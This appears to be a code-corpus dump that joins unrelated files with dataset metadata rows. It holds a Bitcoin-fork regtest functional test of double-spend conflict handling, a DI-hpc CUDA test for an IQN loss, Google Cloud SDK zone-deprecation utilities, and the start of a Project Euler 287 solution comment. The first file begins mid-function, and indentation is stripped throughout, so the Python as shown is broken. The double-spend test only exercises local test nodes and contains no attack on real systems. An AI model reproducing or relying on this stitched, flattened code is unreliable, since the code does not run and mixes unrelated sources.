spend_from_foo = starting_balance - INITIAL_BLOCK_REWARD*5
spend_from_bar = INITIAL_BLOCK_REWARD*5 - 100
spend_from_doublespend = spend_from_foo + spend_from_bar - 8
# Assign coins to foo and bar addresses:
node0_address_foo = self.nodes[0].getnewaddress()
fund_foo_txid = self.nodes[0].sendtoaddress(node0_address_foo, spend_from_foo)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress()
fund_bar_txid = self.nodes[0].sendtoaddress(node0_address_bar, spend_from_bar)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(),
starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress()
# First: use raw transaction API to send 1240 BTC to node1_address,
# but don't broadcast:
doublespend_fee = Decimal('-.02')
rawtx_input_0 = {}
rawtx_input_0["txid"] = fund_foo_txid
rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, spend_from_foo)
rawtx_input_1 = {}
rawtx_input_1["txid"] = fund_bar_txid
rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, spend_from_bar)
inputs = [rawtx_input_0, rawtx_input_1]
change_address = self.nodes[0].getnewaddress()
outputs = {}
outputs[node1_address] = spend_from_doublespend
outputs[change_address] = spend_from_foo + spend_from_bar - spend_from_doublespend + doublespend_fee
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
doublespend = self.nodes[0].signrawtransactionwithwallet(rawtx)
assert_equal(doublespend["complete"], True)
# Create two spends using 1 50 BTC coin each
txid1 = self.nodes[0].sendtoaddress(node1_address, (INITIAL_BLOCK_REWARD/5) * 4)
txid2 = self.nodes[0].sendtoaddress(node1_address, (INITIAL_BLOCK_REWARD/5) * 2)
# Have node0 mine a block:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50BTC for another
# matured block, minus 40, minus 20, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block:
expected += INITIAL_BLOCK_REWARD
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance(), starting_balance - (tx1["amount"]+tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Now give doublespend and its parents to miner:
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Both transactions should be conflicted
assert_equal(tx1["confirmations"], -2)
assert_equal(tx2["confirmations"], -2)
# Node0's total balance should be starting balance, plus 100BTC for
# two more matured blocks, minus 1240 for the double-spend, plus fees (which are
# negative):
expected = starting_balance + 2*INITIAL_BLOCK_REWARD - spend_from_doublespend + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*"), expected)
# Final "" balance is starting_balance - amount moved to accounts - doublespend + subsidies +
# fees (which are negative)
assert_equal(self.nodes[0].getbalance(), starting_balance
- spend_from_doublespend
+ 2*INITIAL_BLOCK_REWARD
+ fund_foo_tx["fee"]
+ fund_bar_tx["fee"]
+ doublespend_fee)
if __name__ == '__main__':
TxnMallTest().main()
| 46.178808 | 145 | 0.641761 |
from decimal import Decimal
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.zerohourconfig import INITIAL_BLOCK_REWARD
class TxnMallTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
super().setup_network()
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
def run_test(self):
starting_balance = 25*INITIAL_BLOCK_REWARD
for n in self.nodes:
assert n.getblockchaininfo()["initialblockdownload"] == False
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("")
spend_from_foo = starting_balance - INITIAL_BLOCK_REWARD*5
spend_from_bar = INITIAL_BLOCK_REWARD*5 - 100
spend_from_doublespend = spend_from_foo + spend_from_bar - 8
node0_address_foo = self.nodes[0].getnewaddress()
fund_foo_txid = self.nodes[0].sendtoaddress(node0_address_foo, spend_from_foo)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress()
fund_bar_txid = self.nodes[0].sendtoaddress(node0_address_bar, spend_from_bar)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(),
starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"])
node1_address = self.nodes[1].getnewaddress()
doublespend_fee = Decimal('-.02')
rawtx_input_0 = {}
rawtx_input_0["txid"] = fund_foo_txid
rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, spend_from_foo)
rawtx_input_1 = {}
rawtx_input_1["txid"] = fund_bar_txid
rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, spend_from_bar)
inputs = [rawtx_input_0, rawtx_input_1]
change_address = self.nodes[0].getnewaddress()
outputs = {}
outputs[node1_address] = spend_from_doublespend
outputs[change_address] = spend_from_foo + spend_from_bar - spend_from_doublespend + doublespend_fee
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
doublespend = self.nodes[0].signrawtransactionwithwallet(rawtx)
assert_equal(doublespend["complete"], True)
# Create two spends using 1 50 BTC coin each
txid1 = self.nodes[0].sendtoaddress(node1_address, (INITIAL_BLOCK_REWARD/5) * 4)
txid2 = self.nodes[0].sendtoaddress(node1_address, (INITIAL_BLOCK_REWARD/5) * 2)
# Have node0 mine a block:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50BTC for another
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block:
expected += INITIAL_BLOCK_REWARD
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
assert_equal(self.nodes[1].getbalance(), starting_balance - (tx1["amount"]+tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Now give doublespend and its parents to miner:
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Both transactions should be conflicted
assert_equal(tx1["confirmations"], -2)
assert_equal(tx2["confirmations"], -2)
# Node0's total balance should be starting balance, plus 100BTC for
expected = starting_balance + 2*INITIAL_BLOCK_REWARD - spend_from_doublespend + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*"), expected)
assert_equal(self.nodes[0].getbalance(), starting_balance
- spend_from_doublespend
+ 2*INITIAL_BLOCK_REWARD
+ fund_foo_tx["fee"]
+ fund_bar_tx["fee"]
+ doublespend_fee)
if __name__ == '__main__':
TxnMallTest().main()
| true | true |
79010f186d2da99e9bc0099a880f3e7a056a1dbe | 6,308 | py | Python | tests/test_iqn_nstep_td_error.py | opendilab/DI-hpc | 8f001382cd1c0119013e1d0d0e98ff41c751d8a2 | [
"Apache-2.0"
] | 64 | 2021-07-08T02:18:08.000Z | 2022-02-28T09:52:57.000Z | tests/test_iqn_nstep_td_error.py | opendilab/DI-hpc | 8f001382cd1c0119013e1d0d0e98ff41c751d8a2 | [
"Apache-2.0"
] | null | null | null | tests/test_iqn_nstep_td_error.py | opendilab/DI-hpc | 8f001382cd1c0119013e1d0d0e98ff41c751d8a2 | [
"Apache-2.0"
] | 3 | 2021-07-14T08:58:45.000Z | 2022-03-30T12:36:46.000Z | import time
import torch
from hpc_rll.origin.td import iqn_nstep_td_error, iqn_nstep_td_data
from hpc_rll.rl_utils.td import IQNNStepTDError
from testbase import mean_relative_error, times
assert torch.cuda.is_available()
use_cuda = True
tau = 33
tauPrime = 34
T = 10
B = 64
N = 8
gamma = 0.95
kappa = 0.9
def iqn_val():
ori_q = torch.randn(tau, B, N)
ori_next_n_q = torch.randn(tauPrime, B, N)
ori_action = torch.randint(0, N, size=(B, ))
ori_next_n_action = torch.randint(0, N, size=(B, ))
ori_reward = torch.randn(T, B)
ori_done = torch.randn(B)
ori_r_q = torch.randn(tau, B)
ori_weight = torch.randn(B)
ori_value_gamma = torch.randn(B)
hpc_q = ori_q.clone().detach()
hpc_next_n_q = ori_next_n_q.clone().detach()
hpc_action = ori_action.clone().detach()
hpc_next_n_action = ori_next_n_action.clone().detach()
hpc_reward = ori_reward.clone().detach()
hpc_done = ori_done.clone().detach()
hpc_r_q = ori_r_q.clone().detach()
hpc_weight = ori_weight.clone().detach()
hpc_value_gamma = ori_value_gamma.clone().detach()
hpc_iqn = IQNNStepTDError(tau, tauPrime, T, B, N)
if use_cuda:
ori_q = ori_q.cuda()
ori_next_n_q = ori_next_n_q.cuda()
ori_action = ori_action.cuda()
ori_next_n_action = ori_next_n_action.cuda()
ori_reward = ori_reward.cuda()
ori_done = ori_done.cuda()
ori_r_q = ori_r_q.cuda()
ori_weight = ori_weight.cuda()
ori_value_gamma = ori_value_gamma.cuda()
hpc_q = hpc_q.cuda()
hpc_next_n_q = hpc_next_n_q.cuda()
hpc_action = hpc_action.cuda()
hpc_next_n_action = hpc_next_n_action.cuda()
hpc_reward = hpc_reward.cuda()
hpc_done = hpc_done.cuda()
hpc_r_q = hpc_r_q.cuda()
hpc_weight = hpc_weight.cuda()
hpc_value_gamma = hpc_value_gamma.cuda()
hpc_iqn = hpc_iqn.cuda()
ori_q.requires_grad_(True)
ori_loss, ori_ = iqn_nstep_td_error(iqn_nstep_td_data(ori_q, ori_next_n_q, ori_action, ori_next_n_action, ori_reward, ori_done, ori_r_q, ori_weight), gamma, T, kappa, ori_value_gamma)
ori_loss = ori_loss.mean()
ori_loss.backward()
if use_cuda:
torch.cuda.synchronize()
torch.cuda.cudart().cudaProfilerStart()
hpc_q.requires_grad_(True)
hpc_loss, hpc_ = hpc_iqn(hpc_q, hpc_next_n_q, hpc_action, hpc_next_n_action, hpc_reward, hpc_done, hpc_r_q, gamma, kappa, hpc_weight, hpc_value_gamma)
hpc_loss = hpc_loss.mean()
hpc_loss.backward()
if use_cuda:
torch.cuda.synchronize()
torch.cuda.cudart().cudaProfilerStop()
mre = mean_relative_error(torch.flatten(ori_loss).cpu().detach().numpy(), torch.flatten(hpc_loss).cpu().detach().numpy())
print("iqn fp mean_relative_error: " + str(mre))
mre = mean_relative_error(torch.flatten(ori_q.grad).cpu().detach().numpy(), torch.flatten(hpc_q.grad).cpu().detach().numpy())
print("iqn bp mean_relative_error: " + str(mre))
def iqn_perf():
ori_q = torch.randn(tau, B, N)
ori_next_n_q = torch.randn(tauPrime, B, N)
ori_action = torch.randint(0, N, size=(B, ))
ori_next_n_action = torch.randint(0, N, size=(B, ))
ori_reward = torch.randn(T, B)
ori_done = torch.randn(B)
ori_r_q = torch.randn(tau, B)
ori_weight = torch.randn(B)
ori_value_gamma = torch.randn(B)
hpc_q = ori_q.clone().detach()
hpc_next_n_q = ori_next_n_q.clone().detach()
hpc_action = ori_action.clone().detach()
hpc_next_n_action = ori_next_n_action.clone().detach()
hpc_reward = ori_reward.clone().detach()
hpc_done = ori_done.clone().detach()
hpc_r_q = ori_r_q.clone().detach()
hpc_weight = ori_weight.clone().detach()
hpc_value_gamma = ori_value_gamma.clone().detach()
hpc_iqn = IQNNStepTDError(tau, tauPrime, T, B, N)
if use_cuda:
ori_q = ori_q.cuda()
ori_next_n_q = ori_next_n_q.cuda()
ori_action = ori_action.cuda()
ori_next_n_action = ori_next_n_action.cuda()
ori_reward = ori_reward.cuda()
ori_done = ori_done.cuda()
ori_r_q = ori_r_q.cuda()
ori_weight = ori_weight.cuda()
ori_value_gamma = ori_value_gamma.cuda()
hpc_q = hpc_q.cuda()
hpc_next_n_q = hpc_next_n_q.cuda()
hpc_action = hpc_action.cuda()
hpc_next_n_action = hpc_next_n_action.cuda()
hpc_reward = hpc_reward.cuda()
hpc_done = hpc_done.cuda()
hpc_r_q = hpc_r_q.cuda()
hpc_weight = hpc_weight.cuda()
hpc_iqn = hpc_iqn.cuda()
hpc_value_gamma = hpc_value_gamma.cuda()
ori_q.requires_grad_(True)
for i in range(times):
t = time.time()
ori_loss, ori_ = iqn_nstep_td_error(iqn_nstep_td_data(ori_q, ori_next_n_q, ori_action, ori_next_n_action, ori_reward, ori_done, ori_r_q, ori_weight), gamma, T, kappa, ori_value_gamma)
ori_loss = ori_loss.mean()
ori_loss.backward()
if use_cuda:
torch.cuda.synchronize()
print('epoch: {}, original iqn cost time: {}'.format(i, time.time() - t))
#torch.cuda.cudart().cudaProfilerStart()
hpc_q.requires_grad_(True)
for i in range(times):
t = time.time()
hpc_loss, hpc_ = hpc_iqn(hpc_q, hpc_next_n_q, hpc_action, hpc_next_n_action, hpc_reward, hpc_done, hpc_r_q, gamma, kappa, hpc_weight, hpc_value_gamma)
hpc_loss = hpc_loss.mean()
hpc_loss.backward()
if use_cuda:
torch.cuda.synchronize()
print('epoch: {}, hpc iqn cost time: {}'.format(i, time.time() - t))
#torch.cuda.cudart().cudaProfilerStop()
mre = mean_relative_error(torch.flatten(ori_loss).cpu().detach().numpy(), torch.flatten(hpc_loss).cpu().detach().numpy())
print("iqn fp mean_relative_error: " + str(mre))
mre = mean_relative_error(torch.flatten(ori_q.grad).cpu().detach().numpy(), torch.flatten(hpc_q.grad).cpu().detach().numpy())
print("iqn bp mean_relative_error: " + str(mre))
if __name__ == '__main__':
print("target problem: tau = {}, tauPrime = {}, T = {}, B = {}, N = {}, gamma = {}, kappa = {}".format(tau, tauPrime, T, B, N, gamma, kappa))
print("================run iqn validation test================")
iqn_val()
print("================run iqn performance test================")
iqn_perf()
| 39.425 | 191 | 0.656309 | import time
import torch
from hpc_rll.origin.td import iqn_nstep_td_error, iqn_nstep_td_data
from hpc_rll.rl_utils.td import IQNNStepTDError
from testbase import mean_relative_error, times
assert torch.cuda.is_available()
use_cuda = True
tau = 33
tauPrime = 34
T = 10
B = 64
N = 8
gamma = 0.95
kappa = 0.9
def iqn_val():
ori_q = torch.randn(tau, B, N)
ori_next_n_q = torch.randn(tauPrime, B, N)
ori_action = torch.randint(0, N, size=(B, ))
ori_next_n_action = torch.randint(0, N, size=(B, ))
ori_reward = torch.randn(T, B)
ori_done = torch.randn(B)
ori_r_q = torch.randn(tau, B)
ori_weight = torch.randn(B)
ori_value_gamma = torch.randn(B)
hpc_q = ori_q.clone().detach()
hpc_next_n_q = ori_next_n_q.clone().detach()
hpc_action = ori_action.clone().detach()
hpc_next_n_action = ori_next_n_action.clone().detach()
hpc_reward = ori_reward.clone().detach()
hpc_done = ori_done.clone().detach()
hpc_r_q = ori_r_q.clone().detach()
hpc_weight = ori_weight.clone().detach()
hpc_value_gamma = ori_value_gamma.clone().detach()
hpc_iqn = IQNNStepTDError(tau, tauPrime, T, B, N)
if use_cuda:
ori_q = ori_q.cuda()
ori_next_n_q = ori_next_n_q.cuda()
ori_action = ori_action.cuda()
ori_next_n_action = ori_next_n_action.cuda()
ori_reward = ori_reward.cuda()
ori_done = ori_done.cuda()
ori_r_q = ori_r_q.cuda()
ori_weight = ori_weight.cuda()
ori_value_gamma = ori_value_gamma.cuda()
hpc_q = hpc_q.cuda()
hpc_next_n_q = hpc_next_n_q.cuda()
hpc_action = hpc_action.cuda()
hpc_next_n_action = hpc_next_n_action.cuda()
hpc_reward = hpc_reward.cuda()
hpc_done = hpc_done.cuda()
hpc_r_q = hpc_r_q.cuda()
hpc_weight = hpc_weight.cuda()
hpc_value_gamma = hpc_value_gamma.cuda()
hpc_iqn = hpc_iqn.cuda()
ori_q.requires_grad_(True)
ori_loss, ori_ = iqn_nstep_td_error(iqn_nstep_td_data(ori_q, ori_next_n_q, ori_action, ori_next_n_action, ori_reward, ori_done, ori_r_q, ori_weight), gamma, T, kappa, ori_value_gamma)
ori_loss = ori_loss.mean()
ori_loss.backward()
if use_cuda:
torch.cuda.synchronize()
torch.cuda.cudart().cudaProfilerStart()
hpc_q.requires_grad_(True)
hpc_loss, hpc_ = hpc_iqn(hpc_q, hpc_next_n_q, hpc_action, hpc_next_n_action, hpc_reward, hpc_done, hpc_r_q, gamma, kappa, hpc_weight, hpc_value_gamma)
hpc_loss = hpc_loss.mean()
hpc_loss.backward()
if use_cuda:
torch.cuda.synchronize()
torch.cuda.cudart().cudaProfilerStop()
mre = mean_relative_error(torch.flatten(ori_loss).cpu().detach().numpy(), torch.flatten(hpc_loss).cpu().detach().numpy())
print("iqn fp mean_relative_error: " + str(mre))
mre = mean_relative_error(torch.flatten(ori_q.grad).cpu().detach().numpy(), torch.flatten(hpc_q.grad).cpu().detach().numpy())
print("iqn bp mean_relative_error: " + str(mre))
def iqn_perf():
ori_q = torch.randn(tau, B, N)
ori_next_n_q = torch.randn(tauPrime, B, N)
ori_action = torch.randint(0, N, size=(B, ))
ori_next_n_action = torch.randint(0, N, size=(B, ))
ori_reward = torch.randn(T, B)
ori_done = torch.randn(B)
ori_r_q = torch.randn(tau, B)
ori_weight = torch.randn(B)
ori_value_gamma = torch.randn(B)
hpc_q = ori_q.clone().detach()
hpc_next_n_q = ori_next_n_q.clone().detach()
hpc_action = ori_action.clone().detach()
hpc_next_n_action = ori_next_n_action.clone().detach()
hpc_reward = ori_reward.clone().detach()
hpc_done = ori_done.clone().detach()
hpc_r_q = ori_r_q.clone().detach()
hpc_weight = ori_weight.clone().detach()
hpc_value_gamma = ori_value_gamma.clone().detach()
hpc_iqn = IQNNStepTDError(tau, tauPrime, T, B, N)
if use_cuda:
ori_q = ori_q.cuda()
ori_next_n_q = ori_next_n_q.cuda()
ori_action = ori_action.cuda()
ori_next_n_action = ori_next_n_action.cuda()
ori_reward = ori_reward.cuda()
ori_done = ori_done.cuda()
ori_r_q = ori_r_q.cuda()
ori_weight = ori_weight.cuda()
ori_value_gamma = ori_value_gamma.cuda()
hpc_q = hpc_q.cuda()
hpc_next_n_q = hpc_next_n_q.cuda()
hpc_action = hpc_action.cuda()
hpc_next_n_action = hpc_next_n_action.cuda()
hpc_reward = hpc_reward.cuda()
hpc_done = hpc_done.cuda()
hpc_r_q = hpc_r_q.cuda()
hpc_weight = hpc_weight.cuda()
hpc_iqn = hpc_iqn.cuda()
hpc_value_gamma = hpc_value_gamma.cuda()
ori_q.requires_grad_(True)
for i in range(times):
t = time.time()
ori_loss, ori_ = iqn_nstep_td_error(iqn_nstep_td_data(ori_q, ori_next_n_q, ori_action, ori_next_n_action, ori_reward, ori_done, ori_r_q, ori_weight), gamma, T, kappa, ori_value_gamma)
ori_loss = ori_loss.mean()
ori_loss.backward()
if use_cuda:
torch.cuda.synchronize()
print('epoch: {}, original iqn cost time: {}'.format(i, time.time() - t))
hpc_q.requires_grad_(True)
for i in range(times):
t = time.time()
hpc_loss, hpc_ = hpc_iqn(hpc_q, hpc_next_n_q, hpc_action, hpc_next_n_action, hpc_reward, hpc_done, hpc_r_q, gamma, kappa, hpc_weight, hpc_value_gamma)
hpc_loss = hpc_loss.mean()
hpc_loss.backward()
if use_cuda:
torch.cuda.synchronize()
print('epoch: {}, hpc iqn cost time: {}'.format(i, time.time() - t))
mre = mean_relative_error(torch.flatten(ori_loss).cpu().detach().numpy(), torch.flatten(hpc_loss).cpu().detach().numpy())
print("iqn fp mean_relative_error: " + str(mre))
mre = mean_relative_error(torch.flatten(ori_q.grad).cpu().detach().numpy(), torch.flatten(hpc_q.grad).cpu().detach().numpy())
print("iqn bp mean_relative_error: " + str(mre))
if __name__ == '__main__':
print("target problem: tau = {}, tauPrime = {}, T = {}, B = {}, N = {}, gamma = {}, kappa = {}".format(tau, tauPrime, T, B, N, gamma, kappa))
print("================run iqn validation test================")
iqn_val()
print("================run iqn performance test================")
iqn_perf()
| true | true |
79010f19134681f4a4139685bf23c998b96ba2ab | 4,488 | py | Python | lib/googlecloudsdk/api_lib/compute/zone_utils.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/api_lib/compute/zone_utils.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 11 | 2020-02-29T02:51:12.000Z | 2022-03-30T23:20:08.000Z | lib/googlecloudsdk/api_lib/compute/zone_utils.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | 1 | 2020-07-24T18:47:35.000Z | 2020-07-24T18:47:35.000Z | # -*- coding: utf-8 -*- #
# Copyright 2014 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common classes and functions for zones."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import request_helper
from googlecloudsdk.api_lib.compute import utils
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.core.console import console_io
class ZoneResourceFetcher(object):
"""A (small) collection of utils for working with zones."""
def __init__(self, compute_client):
"""Instantiate ZoneResourceFetcher and embed all required data into it.
ZoneResourceFetcher is a class depending on "base_classes"
class layout (properties side-derived from one of base_class class). This
function can be used to avoid unfeasible inheritance and use composition
instead when refactoring away from base_classes into stateless style.
This constructor embeds following properties into ZoneResourceFetcher
instance:
- compute
- messages
- http
- batch_url
Example:
compute_holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
client = compute_holder.client
zone_resource_fetcher = ZoneResourceFetcher(client)
or
zone_resource_fetcher = ZoneResourceFetcher(self.compute_client)
to use in a class derived from some of base_classes
zone_resource_fetcher.WarnForZonalCreation(...)
Args:
compute_client: compute_holder.client
"""
self._compute = compute_client.apitools_client
self._messages = compute_client.messages
self._http = compute_client.apitools_client.http
self._batch_url = compute_client.batch_url
def GetZones(self, resource_refs):
"""Fetches zone resources."""
errors = []
requests = []
zone_names = set()
for resource_ref in resource_refs:
if resource_ref.zone not in zone_names:
zone_names.add(resource_ref.zone)
requests.append((
self._compute.zones,
'Get',
self._messages.ComputeZonesGetRequest(
project=resource_ref.project,
zone=resource_ref.zone)))
res = list(request_helper.MakeRequests(
requests=requests,
http=self._http,
batch_url=self._batch_url,
errors=errors))
if errors:
return None
else:
return res
def WarnForZonalCreation(self, resource_refs):
"""Warns the user if a zone has upcoming deprecation."""
zones = self.GetZones(resource_refs)
if not zones:
return
prompts = []
zones_with_deprecated = []
for zone in zones:
if zone.deprecated:
zones_with_deprecated.append(zone)
if not zones_with_deprecated:
return
if zones_with_deprecated:
phrases = []
if len(zones_with_deprecated) == 1:
phrases = ('zone is', 'this zone', 'the')
else:
phrases = ('zones are', 'these zones', 'their')
title = ('\n'
'WARNING: The following selected {0} deprecated.'
' All resources in {1} will be deleted after'
' {2} turndown date.'.format(phrases[0], phrases[1], phrases[2]))
printable_deprecated_zones = []
for zone in zones_with_deprecated:
if zone.deprecated.deleted:
printable_deprecated_zones.append(('[{0}] {1}').format(zone.name,
zone.deprecated
.deleted))
else:
printable_deprecated_zones.append('[{0}]'.format(zone.name))
prompts.append(utils.ConstructList(title, printable_deprecated_zones))
final_message = ' '.join(prompts)
if not console_io.PromptContinue(message=final_message):
raise calliope_exceptions.ToolException('Creation aborted by user.')
| 35.0625 | 80 | 0.679367 |
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import request_helper
from googlecloudsdk.api_lib.compute import utils
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.core.console import console_io
class ZoneResourceFetcher(object):
def __init__(self, compute_client):
self._compute = compute_client.apitools_client
self._messages = compute_client.messages
self._http = compute_client.apitools_client.http
self._batch_url = compute_client.batch_url
def GetZones(self, resource_refs):
errors = []
requests = []
zone_names = set()
for resource_ref in resource_refs:
if resource_ref.zone not in zone_names:
zone_names.add(resource_ref.zone)
requests.append((
self._compute.zones,
'Get',
self._messages.ComputeZonesGetRequest(
project=resource_ref.project,
zone=resource_ref.zone)))
res = list(request_helper.MakeRequests(
requests=requests,
http=self._http,
batch_url=self._batch_url,
errors=errors))
if errors:
return None
else:
return res
def WarnForZonalCreation(self, resource_refs):
zones = self.GetZones(resource_refs)
if not zones:
return
prompts = []
zones_with_deprecated = []
for zone in zones:
if zone.deprecated:
zones_with_deprecated.append(zone)
if not zones_with_deprecated:
return
if zones_with_deprecated:
phrases = []
if len(zones_with_deprecated) == 1:
phrases = ('zone is', 'this zone', 'the')
else:
phrases = ('zones are', 'these zones', 'their')
title = ('\n'
'WARNING: The following selected {0} deprecated.'
' All resources in {1} will be deleted after'
' {2} turndown date.'.format(phrases[0], phrases[1], phrases[2]))
printable_deprecated_zones = []
for zone in zones_with_deprecated:
if zone.deprecated.deleted:
printable_deprecated_zones.append(('[{0}] {1}').format(zone.name,
zone.deprecated
.deleted))
else:
printable_deprecated_zones.append('[{0}]'.format(zone.name))
prompts.append(utils.ConstructList(title, printable_deprecated_zones))
final_message = ' '.join(prompts)
if not console_io.PromptContinue(message=final_message):
raise calliope_exceptions.ToolException('Creation aborted by user.')
| true | true |
79010f9ce34ee46f7f5afed5ce86db595bcde4be | 3,739 | py | Python | solutions/p287.py | xianlinfeng/project_euler_python3 | 77eca44eb2b1d13bc70d6dc0258b737449d43a23 | [
"MIT"
] | null | null | null | solutions/p287.py | xianlinfeng/project_euler_python3 | 77eca44eb2b1d13bc70d6dc0258b737449d43a23 | [
"MIT"
] | null | null | null | solutions/p287.py | xianlinfeng/project_euler_python3 | 77eca44eb2b1d13bc70d6dc0258b737449d43a23 | [
"MIT"
] | null | null | null | #
# Solution to Project Euler problem 287
# Copyright (c) Project Nayuki. All rights reserved.
#
# https://www.nayuki.io/page/project-euler-solutions
# https://github.com/nayuki/Project-Euler-solutions
#
# Let R = 2^(N-1) denote the radius of the circle (filled disk) being drawn.
#
# First, we can simplify the problem by translating (shifting) the coordinate system.
# Instead of x and y each in [0, 2^N) for the formula [x - 2^(N-1)]^2 + [y - 2^(N-1)]^2 <= R^2,
# we shall consider x and y each in [-(2^(N-1)), 2^(N-1)) for the formula x^2 + y^2 <= R^2.
#
# Suppose we are given a square 2D region with endpoints [xstart, xend) and [ystart, yend).
# If the region is entirely white or entirely black, then it takes 2 bits to encode the region.
# Otherwise the region must have both white and black pixels, so we use 1 bit
# to encode the split, recurse on the 4 sub-squares, and sum their code lengths.
#
# Within the region, what are the possible values of the left side of the formula, x^2 + y^2?
# To minimize or maximize x^2 + y^2, we can min/maximize each of x^2 and y^2 independently.
# - To minimize x^2, we minimize |x|. If 0 is in [xstart, xend),
# then the minimum |x| is 0, and thus the minimum x^2 is 0.
# Otherwise, either all possible x values are negative or all
# are positive, so the minimum |x| is min(|xstart|, |xend-1|).
# - To maximize x^2, we maximize |x|. This simply equals max(|xstart|, |xend-1|).
# - The same arguments apply to minimizing/maximizing y^2.
#
# Now evaluate minR^2 = minX^2 + minY^2, and maxR^2 = maxX^2 + maxY^2.
# - If maxR^2 <= R^2, then all points in the region satisfy
# x^2 + y^2 <= R^2, hence the entire region is black.
# - Similarly, if minR^2 > R^2, then all points in the region
# satisfy x^2 + y^2 > R^2, hence the entire region is white.
# - Otherwise, the region must contain both black and white points,
# so we split into 4 subregions and recurse.
#
# One further optimization: If the region [xstart, xend) * [ystart, yend) lies
# entirely within a quadrant, then calculating minR and maxR becomes trivial.
# In fact, only the root call to compressed_length() spans both positive
# and negative coordinates; all deeper calls are entirely within a quadrant.
# For a region with [xstart, xend) where xstart < xend <= 0, compressed_length()
